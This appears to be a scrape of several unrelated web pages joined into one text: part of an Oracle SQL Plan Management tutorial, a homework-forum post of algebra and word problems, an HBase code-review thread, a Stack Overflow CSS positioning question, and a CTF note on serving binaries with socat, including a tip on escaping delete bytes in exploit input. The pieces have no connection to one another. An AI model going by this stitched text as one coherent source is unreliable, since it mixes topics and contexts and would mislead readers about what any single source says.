learn how to use the DBMS_SPM.LOAD_PLANS_FROM_CURSOR_CACHE function 23.4.3 Loading Plans from a Staging Table You may want to transfer optimal plans from a source database to a different destination database. For example, you may have investigated a set of plans on a test database and confirmed that they have performed well. You may then want to load these plans into a production database. A staging table is a table that, for the duration of its existence, stores plans so that the plans do not disappear from the table while you are unpacking them. Use the DBMS.CREATE_STGTAB_BASELINE procedure to create a staging table. To pack (insert row into) and unpack (extract rows from) the staging table, use the PACK_STGTAB_BASELINE and UNPACK_STGTAB_BASELINE functions of the DBMS_SPM package. Oracle Data Pump Import and Export enable you to copy the staging table to a different database. The following graphic depicts the basic steps. Description of tgsql_vm_006.png follows Description of the illustration tgsql_vm_006.png Assumptions This tutorial assumes the following: • You want to create a staging table named stage1 in the source database. • You want to load all plans owned by user spm into the staging table. • You want to transfer the staging table to a destination database. • You want to load the plans in stage1 as fixed plans. To transfer a set of SQL plan baselines from one database to another:  1. Connect SQL*Plus to the source database with the appropriate privileges, and then create a staging table using the CREATE_STGTAB_BASELINE procedure. The following example creates a staging table named stage1: BEGIN DBMS_SPM.CREATE_STGTAB_BASELINE ( table_name => 'stage1'); END; / 2. On the source database, pack the SQL plan baselines you want to export from the SQL management base into the staging table. The following example packs enabled plan baselines created by user spm into staging table stage1. Select SQL plan baselines using the plan name (plan_name), SQL handle (sql_handle), or any other plan criteria. The table_name parameter is mandatory. DECLARE my_plans number; BEGIN my_plans := DBMS_SPM.PACK_STGTAB_BASELINE ( table_name => 'stage1' , enabled => 'yes' , creator => 'spm' ); END; / 3. Export the staging table stage1 into a dump file using Oracle Data Pump Export. 4. Transfer the dump file to the host of the destination database. 5. On the destination database, import the staging table stage1 from the dump file using the Oracle Data Pump Import utility. 6. On the destination database, unpack the SQL plan baselines from the staging table into the SQL management base. The following example unpacks all fixed plan baselines stored in the staging table stage1: DECLARE my_plans NUMBER; BEGIN my_plans := DBMS_SPM.UNPACK_STGTAB_BASELINE ( table_name => 'stage1' , fixed => 'yes' ); END; / See Also: 23.5 Evolving SQL Plan Baselines Manually Oracle recommends that you configure the SQL Plan Management Evolve task to run automatically, as explained in "Managing the SPM Evolve Advisor Task". You can also use PL/SQL or Cloud Control to manually evolve an unaccepted plan to determine whether it performs better than any plan currently in the plan baseline. This section contains the following topics: 23.5.1 About the DBMS_SPM Evolve Functions Table 23-5 describes the most relevant DBMS_SPM procedures and functions for managing plan evolution. Execute evolution tasks manually or schedule them to run automatically. Table 23-5 DBMS_SPM Functions and Procedures for Managing Plan Evolution Tasks Package Procedure or Function Description DBMS_SPM ACCEPT_SQL_PLAN_BASELINE This function accepts one recommendation to evolve a single plan into a SQL plan baseline. DBMS_SPM CREATE_EVOLVE_TASK This function creates an advisor task to prepare the plan evolution of one or more plans for a specified SQL statement. The input parameters can be a SQL handle, plan name or a list of plan names, time limit, task name, and description. DBMS_SPM EXECUTE_EVOLVE_TASK This function executes an evolution task. The input parameters can be the task name, execution name, and execution description. If not specified, the advisor generates the name, which is returned by the function. DBMS_SPM IMPLEMENT_EVOLVE_TASK This function implements all recommendations for an evolve task. Essentially, this function is equivalent to using ACCEPT_SQL_PLAN_BASELINE for all recommended plans. Input parameters include task name, plan name, owner name, and execution name. DBMS_SPM REPORT_EVOLVE_TASK This function displays the results of an evolve task as a CLOB. Input parameters include the task name and section of the report to include. DBMS_SPM SET_EVOLVE_TASK_PARAMETER This function updates the value of an evolve task parameter. In this release, the only valid parameter is TIME_LIMIT. Oracle recommends that you configure SPM Evolve Advisor to run automatically (see "Configuring the Automatic SPM Evolve Advisor Task"). You can also evolve SQL plan baselines manually. Figure 23-4 shows the basic workflow for managing SQL plan management tasks. Figure 23-4 Evolving SQL Plan Baselines Description of Figure 23-4 follows Description of "Figure 23-4 Evolving SQL Plan Baselines" Typically, you manage SQL plan evolution tasks in the following sequence: 1. Create an evolve task 2. Optionally, set evolve task parameters 3. Execute the evolve task 4. Implement the recommendations in the task 5. Report on the task outcome See Also: Oracle Database PL/SQL Packages and Types Reference for information about the DBMS_SPM package 23.5.2 Managing an Evolve Task This section describes a typical use case in which you create and execute a task, and then implements its recommendations. Table 23-6 describes some parameters of the CREATE_EVOLVE_TASK function. Table 23-6 DBMS_SPM.CREATE_EVOLVE_TASK Parameters Function Parameter Description sql_handle SQL handle of the statement. The default NULL considers all SQL statements with unaccepted plans. plan_name Plan identifier. The default NULL means consider all unaccepted plans of the specified SQL handle or all SQL statements if the SQL handle is NULL. time_limit Time limit in number of minutes. The time limit for first unaccepted plan equals the input value. The time limit for the second unaccepted plan equals the input value minus the time spent in first plan verification, and so on. The default DBMS_SPM.AUTO_LIMIT means let the system choose an appropriate time limit based on the number of plan verifications required to be done. task_name User-specified name of the evolution task. This section explains how to evolve plan baselines from the command line. In Cloud Control, from the SQL Plan Baseline subpage (shown in Figure 23-3), select a plan, and then click Evolve. Assumptions This tutorial assumes the following: • You do not have the automatic evolve task enabled (see "Managing the SPM Evolve Advisor Task"). • You want to create a SQL plan baseline for the following query: SELECT /* q1_group_by */ prod_name, sum(quantity_sold) FROM products p, sales s WHERE p.prod_id = s.prod_id AND p.prod_category_id =203 GROUP BY prod_name; • You want to create two indexes to improve the query performance, and then evolve the plan that uses these indexes if it performs better than the plan currently in the plan baseline. To evolve a specified plan:  1. Perform the initial setup as follows: 1. Connect SQL*Plus to the database with administrator privileges, and then prepare for the tutorial by flushing the shared pool and the buffer cache: ALTER SYSTEM FLUSH SHARED_POOL; ALTER SYSTEM FLUSH BUFFER_CACHE; 2. Enable the automatic capture of SQL plan baselines. For example, enter the following statement: ALTER SYSTEM SET OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES=true; 3. Connect to the database as user sh, and then set SQL*Plus display parameters: CONNECT sh -- enter password SET PAGES 10000 LINES 140 SET SERVEROUTPUT ON COL SQL_TEXT FORMAT A20 COL SQL_HANDLE FORMAT A20 COL PLAN_NAME FORMAT A30 COL ORIGIN FORMAT A12 SET LONGC 60535 SET LONG 60535 SET ECHO ON 2. Execute the SELECT statements so that SQL plan management captures them: 1. Execute the SELECT /* q1_group_by */ statement for the first time. Because the database only captures plans for repeatable statements, the plan baseline for this statement is empty. 2. Query the data dictionary to confirm that no plans exist in the plan baseline. For example, execute the following query (sample output included): SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, ORIGIN, ENABLED, ACCEPTED, FIXED, AUTOPURGE FROM DBA_SQL_PLAN_BASELINES WHERE SQL_TEXT LIKE '%q1_group%'; no rows selected SQL plan management only captures repeatable statements, so this result is expected. 3. Execute the SELECT /* q1_group_by */ statement for the second time. 3. Query the data dictionary to ensure that the plans were loaded into the plan baseline for the statement. Example 23-4 executes the following query (sample output included). Example 23-4 DBA_SQL_PLAN_BASELINES SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, ORIGIN, ENABLED, ACCEPTED, FIXED FROM DBA_SQL_PLAN_BASELINES WHERE SQL_TEXT LIKE '%q1_group%'; SQL_HANDLE SQL_TEXT PLAN_NAME ORIGIN ENA ACC FIX -------------------- -------------------- ------------------------------ ------------ --- --- --- SQL_07f16c76ff893342 SELECT /* q1_group_b SQL_PLAN_0gwbcfvzskcu242949306 AUTO-CAPTURE YES YES NO y */ prod_name, sum( quantity_sold) FROM products p, s ales s WHERE p.prod_id = s .prod_id AND p.prod_catego ry_id =203 GROUP BY prod_name The output shows that the plan is accepted, which means that it is in the plan baseline for the statement. Also, the origin is AUTO-CAPTURE, which means that the statement was automatically captured and not manually loaded. 4. Explain the plan for the statement and verify that the optimizer is using this plan. For example, explain the plan as follows, and then display it: EXPLAIN PLAN FOR SELECT /* q1_group_by */ prod_name, sum(quantity_sold) FROM products p, sales s WHERE p.prod_id = s.prod_id AND p.prod_category_id =203 GROUP BY prod_name; SELECT * FROM TABLE(DBMS_XPLAN.DISPLAY(null, null, 'basic +note')); Sample output appears below: Plan hash value: 1117033222 ------------------------------------------ | Id | Operation | Name | ------------------------------------------ | 0 | SELECT STATEMENT | | | 1 | HASH GROUP BY | | | 2 | HASH JOIN | | | 3 | TABLE ACCESS FULL | PRODUCTS | | 4 | PARTITION RANGE ALL| | | 5 | TABLE ACCESS FULL | SALES | ------------------------------------------ Note ----- - SQL plan baseline "SQL_PLAN_0gwbcfvzskcu242949306" used for this statement The note indicates that the optimizer is using the plan shown with the plan name listed in Example 23-4. 5. Create two indexes to improve the performance of the SELECT /* q1_group_by */ statement. For example, use the following statements: CREATE INDEX ind_prod_cat_name ON products(prod_category_id, prod_name, prod_id); CREATE INDEX ind_sales_prod_qty_sold ON sales(prod_id, quantity_sold); 6. Execute the select /* q1_group_by */ statement again. Because automatic capture is enabled, the plan baseline is populated with the new plan for this statement. 7. Query the data dictionary to ensure that the plan was loaded into the SQL plan baseline for the statement. Example 23-5 executes the following query (sample output included). Example 23-5 DBA_SQL_PLAN_BASELINES SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, ORIGIN, ENABLED, ACCEPTED FROM DBA_SQL_PLAN_BASELINES WHERE SQL_HANDLE IN ('SQL_07f16c76ff893342') ORDER BY SQL_HANDLE, ACCEPTED; SQL_HANDLE SQL_TEXT PLAN_NAME ORIGIN ENA ACC -------------------- -------------------- ------------------------------ ------------ --- --- SQL_07f16c76ff893342 SELECT /* q1_group_b SQL_PLAN_0gwbcfvzskcu20135fd6c AUTO-CAPTURE YES NO y */ prod_name, sum( quantity_sold) FROM products p, s ales s WHERE p.prod_id = s .prod_id AND p.prod_catego ry_id =203 GROUP BY prod_name SQL_07f16c76ff893342 SELECT /* q1_group_b SQL_PLAN_0gwbcfvzskcu242949306 AUTO-CAPTURE YES YES y */ prod_name, sum( quantity_sold) FROM products p, s ales s WHERE p.prod_id = s .prod_id AND p.prod_catego ry_id =203 GROUP BY prod_name The output shows that the new plan is unaccepted, which means that it is in the statement history but not the SQL plan baseline. 8. Explain the plan for the statement and verify that the optimizer is using the original nonindexed plan. For example, explain the plan as follows, and then display it: EXPLAIN PLAN FOR SELECT /* q1_group_by */ prod_name, sum(quantity_sold) FROM products p, sales s WHERE p.prod_id = s.prod_id AND p.prod_category_id =203 GROUP BY prod_name; SELECT * FROM TABLE(DBMS_XPLAN.DISPLAY(null, null, 'basic +note')); Sample output appears below: Plan hash value: 1117033222 ------------------------------------------ | Id | Operation | Name | ------------------------------------------ | 0 | SELECT STATEMENT | | | 1 | HASH GROUP BY | | | 2 | HASH JOIN | | | 3 | TABLE ACCESS FULL | PRODUCTS | | 4 | PARTITION RANGE ALL| | | 5 | TABLE ACCESS FULL | SALES | ------------------------------------------ Note ----- - SQL plan baseline "SQL_PLAN_0gwbcfvzskcu242949306" used for this statement The note indicates that the optimizer is using the plan shown with the plan name listed in Example 23-4. 9. Connect as an administrator, and then create an evolve task that considers all SQL statements with unaccepted plans. For example, execute the DBMS_SPM.CREATE_EVOLVE_TASK function and then obtain the name of the task: CONNECT / AS SYSDBA VARIABLE cnt NUMBER VARIABLE tk_name VARCHAR2(50) VARIABLE exe_name VARCHAR2(50) VARIABLE evol_out CLOB EXECUTE :tk_name := DBMS_SPM.CREATE_EVOLVE_TASK( sql_handle => 'SQL_07f16c76ff893342', plan_name => 'SQL_PLAN_0gwbcfvzskcu20135fd6c'); SELECT :tk_name FROM DUAL; The following sample output shows the name of the task: :EVOL_OUT ------------------------------------------------------------------------------ TASK_11 Now that the task has been created and has a unique name, execute the task. 10. Execute the task. For example, execute the DBMS_SPM.EXECUTE_EVOLVE_TASK function (sample output included): EXECUTE :exe_name :=DBMS_SPM.EXECUTE_EVOLVE_TASK(task_name=>:tk_name); SELECT :exe_name FROM DUAL; :EXE_NAME ------------------------------------------------------------------------------- EXEC_1 11. View the report. For example, execute the DBMS_SPM.REPORT_EVOLVE_TASK function (sample output included): EXECUTE :evol_out := DBMS_SPM.REPORT_EVOLVE_TASK( task_name=>:tk_name, execution_name=>:exe_name ); SELECT :evol_out FROM DUAL; GENERAL INFORMATION SECTION ------------------------------------------------------------------------------ Task Information: --------------------------------------------- Task Name : TASK_11 Task Owner : SYS Execution Name : EXEC_1 Execution Type : SPM EVOLVE Scope : COMPREHENSIVE Status : COMPLETED Started : 01/09/2012 12:21:27 Finished : 01/09/2012 12:21:29 Last Updated : 01/09/2012 12:21:29 Global Time Limit : 2147483646 Per-Plan Time Limit : UNUSED Number of Errors : 0 ------------------------------------------------------------------------------- SUMMARY SECTION ------------------------------------------------------------------------------- Number of plans processed : 1 Number of findings : 1 Number of recommendations : 1 Number of errors : 0 ------------------------------------------------------------------------------- DETAILS SECTION ------------------------------------------------------------------------------- Object ID : 2 Test Plan Name : SQL_PLAN_0gwbcfvzskcu20135fd6c Base Plan Name : SQL_PLAN_0gwbcfvzskcu242949306 SQL Handle : SQL_07f16c76ff893342 Parsing Schema : SH Test Plan Creator : SH SQL Text : SELECT /* q1_group_by */ prod_name, sum(quantity_sold) FROM products p, sales s WHERE p.prod_id = s.prod_id AND p.prod_category_id =203 GROUP BY prod_name Execution Statistics: ----------------------------- Base Plan Test Plan ---------------------------- ---------------------------- Elapsed Time (s): .044336 .012649 CPU Time (s): .044003 .012445 Buffer Gets: 360 99 Optimizer Cost: 924 891 Disk Reads: 341 82 Direct Writes: 0 0 Rows Processed: 4 2 Executions: 5 9 FINDINGS SECTION ------------------------------------------------------------------------------- Findings (1): ----------------------------- 1. The plan was verified in 2.18 seconds. It passed the benefit criterion because its verified performance was 2.01 times better than that of the baseline plan. Recommendation: ----------------------------- Consider accepting the plan. Execute dbms_spm.accept_sql_plan_baseline(task_name => 'TASK_11', object_id => 2, task_owner => 'SYS'); EXPLAIN PLANS SECTION ------------------------------------------------------------------------------- Baseline Plan ----------------------------- Plan Id : 1 Plan Hash Value : 1117033222 ------------------------------------------------------------------------------- | Id| Operation | Name | Rows | Bytes | Cost | Time | ------------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 21 | 861 | 924 | 00:00:12| | 1 | HASH GROUP BY | | 21 | 861 | 924 | 00:00:12| | *2| HASH JOIN | | 267996 | 10987836 | 742 | 00:00:09| | *3| TABLE ACCESS FULL | PRODUCTS | 21 | 714 | 2 | 00:00:01| | 4 | PARTITION RANGE ALL | | 918843 | 6431901 | 662 | 00:00:08| | 5 | TABLE ACCESS FULL | SALES | 918843 | 6431901 | 662 | 00:00:08| ------------------------------------------------------------------------------ Predicate Information (identified by operation id): ------------------------------------------ * 2 - access("P"."PROD_ID"="S"."PROD_ID") * 3 - filter("P"."PROD_CATEGORY_ID"=203) Test Plan ----------------------------- Plan Id : 2 Plan Hash Value : 20315500 ------------------------------------------------------------------------------- |Id| Operation | Name | Rows | Bytes | Cost| Time| ------------------------------------------------------------------------------- | 0|SELECT STATEMENT | | 21| 861|891|00:00:11 | 1| SORT GROUP BY NOSORT| | 21| 861|891|00:00:11 | 2| NESTED LOOPS | |267996|10987836|891|00:00:11 |*3| INDEX RANGE SCAN |IND_PROD_CAT_NAME | 21| 714| 1|00:00:01 |*4| INDEX RANGE SCAN |IND_SALES_PROD_QTY_SOLD| 12762| 89334| 42|00:00:01 ------------------------------------------------------------------------------- Predicate Information (identified by operation id): ------------------------------------------ * 3 - access("P"."PROD_CATEGORY_ID"=203) * 4 - access("P"."PROD_ID"="S"."PROD_ID") This report indicates that the new execution plan, which uses the two new indexes, performs better than the original plan. 12. Implement the recommendations of the evolve task. For example, execute the IMPLEMENT_EVOLVE_TASK function: EXECUTE :cnt := DBMS_SPM.IMPLEMENT_EVOLVE_TASK( task_name=>:tk_name, execution_name=>:exe_name ); 13. Query the data dictionary to ensure that the new plan is accepted. Example 23-5 executes the following query (sample output included). Example 23-6 DBA_SQL_PLAN_BASELINES SQL_HANDLE SQL_TEXT PLAN_NAME ORIGIN ENA ACC -------------------- -------------------- ------------------------------ ------------ --- --- SQL_07f16c76ff893342 SELECT /* q1_group_b SQL_PLAN_0gwbcfvzskcu20135fd6c AUTO-CAPTURE YES YES y */ prod_name, sum( quantity_sold) FROM products p, s ales s WHERE p.prod_id = s .prod_id AND p.prod_catego ry_id =203 GROUP BY prod_name SQL_07f16c76ff893342 SELECT /* q1_group_b SQL_PLAN_0gwbcfvzskcu242949306 AUTO-CAPTURE YES YES y */ prod_name, sum( quantity_sold) FROM products p, s ales s WHERE p.prod_id = s .prod_id AND p.prod_catego ry_id =203 GROUP BY prod_name The output shows that the new plan is accepted. 14. Clean up after the example. For example, enter the following statements: EXEC :cnt := DBMS_SPM.DROP_SQL_PLAN_BASELINE('SQL_07f16c76ff893342'); EXEC :cnt := DBMS_SPM.DROP_SQL_PLAN_BASELINE('SQL_9049245213a986b3'); EXEC :cnt := DBMS_SPM.DROP_SQL_PLAN_BASELINE('SQL_bb77077f5f90a36b'); EXEC :cnt := DBMS_SPM.DROP_SQL_PLAN_BASELINE('SQL_02a86218930bbb20'); DELETE FROM SQLLOG$; CONNECT sh -- enter password DROP INDEX IND_SALES_PROD_QTY_SOLD; DROP INDEX IND_PROD_CAT_NAME; See Also: Oracle Database PL/SQL Packages and Types Reference for information about using the DBMS_SPM evolve functions 23.6 Dropping SQL Plan Baselines You can remove some or all plans from a SQL plan baseline. This technique is sometimes useful when testing SQL plan management. Drop plans with the DBMS_SPM.DROP_SQL_PLAN_BASELINE function. This function returns the number of dropped plans. Table 23-8 describes input parameters. Table 23-7 DROP_SQL_PLAN_BASELINE Parameters Function Parameter Description sql_handle SQL statement identifier. plan_name Name of a specific plan. Default NULL drops all plans associated with the SQL statement identified by sql_handle. This section explains how to drop baselines from the command line. In Cloud Control, from the SQL Plan Baseline subpage (shown in Figure 23-3), select a plan, and then click Drop. Assumptions This tutorial assumes that you want to drop all plans for the following SQL statement, effectively dropping the SQL plan baseline: SELECT /* repeatable_sql */ COUNT(*) FROM hr.jobs; To drop a SQL plan baseline:  1. Connect SQL*Plus to the database with the appropriate privileges, and then query the data dictionary for the plan baseline. Example 23-7 executes the following query (sample output included). Example 23-7 DBA_SQL_PLAN_BASELINES SQL> SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, ORIGIN, 2 ENABLED, ACCEPTED 3 FROM DBA_SQL_PLAN_BASELINES 4 WHERE SQL_TEXT LIKE 'SELECT /* repeatable_sql%'; SQL_HANDLE SQL_TEXT PLAN_NAME ORIGIN ENA ACC -------------------- -------------------- ------------------------------ -------------- --- --- SQL_b6b0d1c71cd1807b SELECT /* repeatable SQL_PLAN_bdc6jswfd303v2f1e9c20 AUTO-CAPTURE YES YES _sql */ count(*) fro m hr.jobs 2. Drop the SQL plan baseline for the statement. The following example drops the plan baseline with the SQL handle SQL_b6b0d1c71cd1807b, and returns the number of dropped plans. Specify plan baselines using the plan name (plan_name), SQL handle (sql_handle), or any other plan criteria. The table_name parameter is mandatory. DECLARE v_dropped_plans number; BEGIN v_dropped_plans := DBMS_SPM.DROP_SQL_PLAN_BASELINE ( sql_handle => 'SQL_b6b0d1c71cd1807b' ); DBMS_OUTPUT.PUT_LINE('dropped ' || v_dropped_plans || ' plans'); END; / 3. Confirm that the plans were dropped. For example, execute the following query: SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME, ORIGIN, ENABLED, ACCEPTED FROM DBA_SQL_PLAN_BASELINES WHERE SQL_TEXT LIKE 'SELECT /* repeatable_sql%'; no rows selected See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the DROP_SQL_PLAN_BASELINE function 23.7 Managing the SQL Management Base The SQL management base is a part of the data dictionary that resides in the SYSAUX tablespace. It stores statement logs, plan histories, SQL plan baselines, and SQL profiles. This section explains how to change the disk space usage parameters for the SMB, and change the retention time for plans in the SMB. The DBA_SQL_MANAGEMENT_CONFIG view shows the current configuration settings for the SMB. Table 23-8 describes the parameters in the PARAMETER_NAME column. Table 23-8 Parameters in DBA_SQL_MANAGEMENT_CONFIG.PARAMETER_NAME Parameter Description SPACE_BUDGET_PERCENT Maximum percent of SYSAUX space that the SQL management base can use. The default is 10. The allowable range for this limit is between 1% and 50%. PLAN_RETENTION_WEEKS Number of weeks to retain unused plans before they are purged. The default is 53. 23.7.1 Changing the Disk Space Limit for the SMB A weekly background process measures the total space occupied by the SMB. When the defined limit is exceeded, the process writes a warning to the alert log. The database generates alerts weekly until either the SMB space limit is increased, the size of the SYSAUX tablespace is increased, or the disk space used by the SMB is decreased by purging SQL management objects (SQL plan baselines or SQL profiles). This task explains how to change the limit with the DBMS_SPM.CONFIGURE procedure. Assumptions This tutorial assumes the following: • The current SMB space limit is the default of 10%. • You want to change the percentage limit to 30% To change the percentage limit of the SMB:  1. Connect SQL*Plus to the database with the appropriate privileges, and then query the data dictionary to see the current space budget percent. For example, execute the following query (sample output included): SELECT PARAMETER_NAME, PARAMETER_VALUE AS "%_LIMIT", ( SELECT sum(bytes/1024/1024) FROM DBA_DATA_FILES WHERE TABLESPACE_NAME = 'SYSAUX' ) AS SYSAUX_SIZE_IN_MB, PARAMETER_VALUE/100 * ( SELECT sum(bytes/1024/1024) FROM DBA_DATA_FILES WHERE TABLESPACE_NAME = 'SYSAUX' ) AS "CURRENT_LIMIT_IN_MB" FROM DBA_SQL_MANAGEMENT_CONFIG WHERE PARAMETER_NAME = 'SPACE_BUDGET_PERCENT'; PARAMETER_NAME %_LIMIT SYSAUX_SIZE_IN_MB CURRENT_LIMIT_IN_MB ------------------------------ ---------- ----------------- ------------------- SPACE_BUDGET_PERCENT 10 211.4375 21.14375 2. Change the percentage setting. For example, execute the following command to change the setting to 30%: EXECUTE DBMS_SPM.CONFIGURE('space_budget_percent',30); 3. Query the data dictionary to confirm the change. For example, execute the following join (sample output included): SELECT PARAMETER_NAME, PARAMETER_VALUE AS "%_LIMIT", ( SELECT sum(bytes/1024/1024) FROM DBA_DATA_FILES WHERE TABLESPACE_NAME = 'SYSAUX' ) AS SYSAUX_SIZE_IN_MB, PARAMETER_VALUE/100 * ( SELECT sum(bytes/1024/1024) FROM DBA_DATA_FILES WHERE TABLESPACE_NAME = 'SYSAUX' ) AS "CURRENT_LIMIT_IN_MB" FROM DBA_SQL_MANAGEMENT_CONFIG WHERE PARAMETER_NAME = 'SPACE_BUDGET_PERCENT'; PARAMETER_NAME %_LIMIT SYSAUX_SIZE_IN_MB CURRENT_LIMIT_IN_MB ------------------------------ ---------- ----------------- ------------------- SPACE_BUDGET_PERCENT 30 211.4375 63.43125 See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the CONFIGURE function 23.7.2 Changing the Plan Retention Policy in the SMB A weekly scheduled purging task manages disk space used by SQL plan management. The task runs as an automated task in the maintenance window. The database purges plans that have not been used for longer than the plan retention period, as identified by the LAST_EXECUTED timestamp stored in the SMB for that plan. The default retention period is 53 weeks. The period can range between 5 and 523 weeks. This task explains how to change the plan retention period with the DBMS_SPM.CONFIGURE procedure. In Cloud Control, set the plan retention policy in the SQL Plan Baseline subpage (shown in Figure 23-3). To change the plan retention period for the SMB:  1. Connect SQL*Plus to the database with the appropriate privileges, and then query the data dictionary to see the current plan retention period. For example, execute the following query (sample output included): SQL> SELECT PARAMETER_NAME, PARAMETER_VALUE 2 FROM DBA_SQL_MANAGEMENT_CONFIG 3 WHERE PARAMETER_NAME = 'PLAN_RETENTION_WEEKS'; PARAMETER_NAME PARAMETER_VALUE ------------------------------ --------------- PLAN_RETENTION_WEEKS 53 2. Change the retention period. For example, execute the CONFIGURE procedure to change the period to 105 weeks: EXECUTE DBMS_SPM.CONFIGURE('plan_retention_weeks',105); 3. Query the data dictionary to confirm the change. For example, execute the following query: SQL> SELECT PARAMETER_NAME, PARAMETER_VALUE 2 FROM DBA_SQL_MANAGEMENT_CONFIG 3 WHERE PARAMETER_NAME = 'PLAN_RETENTION_WEEKS'; PARAMETER_NAME PARAMETER_VALUE ------------------------------ --------------- PLAN_RETENTION_WEEKS 105 See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the DBMS_SPM.CONFIGURE procedure
__label__pos
0.856838
Friday March 24, 2017 Post a New Question Posted by on Sunday, December 12, 2010 at 12:46am. For questions 1-2, apply the quadratic formula to find the roots of the given function, and then graph the function. 1. f(x) = x2 + 4 (6 points) g(x) = x2 - x – 12 For questions 3-4, factor the quadratic expression completely, and find the roots of the expression. 1. (3 points) 20x2 + 13x + 2 2. (3 points) 49x2 - 14x - 3 For question 5, complete the square, and find the roots of the quadratic equation. 3. (3 points) x2 + 16x = 0 In questions 6-10, use the discriminant to determine the number of solutions of the quadratic equation, and whether the solutions are real or complex. Note: It is not necessary to find the roots; just determine the number and types of solutions. 4. (3 points) x2 + 6x - 7 = 0 5. (3 points) z2 + z + 1 = 0 6. (3 points) (3)1/2y2 - 4y - 7(3)1/2 = 0 7. (3 points) 2x2 - 10x + 25 = 0 8. (3 points) 2x2 - 6x + 5 = 0 9. (5 points) Steve traveled 200 miles at a certain speed. Had he gone 10mph faster, the trip would have taken 1 hour less. Find the speed of his vehicle. 10. (5 points) The Hudson River flows at a rate of 3 miles per hour. A patrol boat travels 60 miles upriver, and returns in a total time of 9 hours. What is the speed of the boat in still water? 11. (5 points) A designer attempts to arrange the characters of his artwork in the form of a square grid with equal numbers of rows and columns, but finds that 24 characters are left out. When he tries to add one more row and column, he finds that he has 25 too few characters. Find the number of characters used by the designer. • College Math - , Sunday, December 12, 2010 at 1:16am We don't do homework here. We assist with it. We don't draw graphs either. Which problem do you need the most help with? We will be glad to critique your thought process. Exponents should be preceded by ^. I do not understand the significance of the (3)'s in question 6. • College Math - , Monday, December 13, 2010 at 4:00am this isnt home work • College Math - , Friday, March 2, 2012 at 10:33am It is homework, I am doing the problems right now in Week 5 Assignment 2 of College Math at the AIPOD. Answer This Question First Name: School Subject: Answer: Related Questions More Related Questions Post a New Question
__label__pos
0.689798
HBASE-2519. Expose IOEs up to client Review Request #75 - Created May 21, 2010 and submitted Todd Lipcon old-hbase HBASE-2519 hbase ryanobjc In particular fixes issues where a compaction that got an error on one storefile would happily proceed and just remove all that data. Or a user scan would just show empty results instead of an error. new unit tests 1. 2. why are we creating a reader here? The incoming store file list is already opened... Re-opening the file might not be the best choice, since if the on-disk situation becomes different from the in-memory we should probably be failing the compactions. Thus the code should be like what it was before only throwing an exception instead of continuing on. 1. createReader is lazy - if the file is already open it returns the existing one. I changed to create() since it was handy to use from the tests (and some other patches on top of this use it in that way as well) 3. remove this pointless catch, it just muddles the stack trace 1. The point of this is that you get the toString of the StoreFileScanner, which includes path name, etc. Otherwise you often get a less useful error like "Could not get block locations for blk_234234, aborting". So while the stack trace is definitely longer, I think there is actual value in having as much information here as possible. 4. ditto, remove the try/catch and let the exception bubble up 5. 1. 2. There are 2 spaces before `throws', need just 1. 1. Just testing review board. Follow up test. 3. 1. One more test. Also I hope we're going to fix the whole situation with IOExceptions all over the place. They're defeating the whole purpose of checked exceptions are *really* annoying in client code (code that uses HBase). 2. 1. 2. i didnt note that, ok then lets keep it 3. 1. 2. 1. 1. This patch is radical. Its going to throw up some new stuff. Best to get it in now. I had two minor issues. I can fix on commit. 2. Why not remove the try/catch and just let the IOE out? 3. Same here (Remove the try/catch and just let the IOE out) 4. 1. I'm going to commit this. 2. Loading...
__label__pos
0.919729
Cody Ma Cody Ma - 6 months ago 29 CSS Question Relative and absolute positioning confusion I'm new to html/css and I've just started wrapping my head around positioning but I seem to have a misunderstanding. Right now I'm trying to create a page header with a horizontal divider right below it. My header is positioned absolutely, with a top and left value of 0, and a height of 88. I thought that if I gave my horizontal divider position: relative, and a height of 5, it would end up right below my header. Instead, it's ending up at the very top of the page, and I'm confused as to why. I would like to use this horizontal divider again on my page, right above my footer, so I don't want to give this horizontal divider position: absolute and top: 88px . Any help is appreciated, thanks so much! My (very simple) code so far: <div id="header"></div> <div class="horizontal-divider"></div> #header { position: absolute; top: 0px; left: 0px; height: 88px; width: 100%; } .horizontal-divider { position: relative; height: 5px; width: 100%; top: 0px; background-color: white; border: 1px solid black; } Answer Absolute positioning positions an element with respect to the edges of its containing block. Its containing block is its closest ancestor that has position set to anything that isn't static. It also takes the element out of normal flow, so it doesn't influence the position of anything that follows it. Relative positioning positions an element with respect to where it would be positioned if it was position: static (not with respect to any other element). Since #header is absolutely positioned, .horizontal-divider is not positioned after it. If you want an element to be rendered immediately after an absolutely positioned element, then: 1. Don't absolutely position the first element 2. Place both elements in another (container) element (so they are laid out one after the other in normal flow) 3. Absolutely position the container element That said, you should be able to get the effect you are after by setting border-bottom on the header and removing the divider entirely.
__label__pos
0.900209
Socat More on socat socat is a "multipurpose relay" often used to serve binary exploitation challenges in CTFs. Essentially, it transfers stdin and stdout to the socket and also allows simple forking capabilities. The following is an example of how you could host a binary on port 5000: 1 socat tcp-l:5000,reuseaddr,fork EXEC:"./vuln",pty,stderr Copied! Most of the command is fairly logical (and the rest you can look up). The important part is that in this scenario we don't have to redirect file descriptors, as socat does it all for us. What is important, however, is pty mode. Because pty mode allows you to communicate with the process as if you were a user, it takes in input literally - including DELETE characters. If you send a \x7f - a DELETE - it will literally delete the previous character (as shown shortly in my Dream Diary: Chapter 1 writeup). This is incredibly relevant because in 64-bit the \x7f is almost always present in glibc addresses, so it's not quite so possible to avoid (although you could keep rerunning the exploit until the rare occasion you get an 0x7e... libc base). To bypass this we use the socat pty escape character \x16 and prepend it to any \x7f we send across. Export as PDF Copy link
__label__pos
0.873483
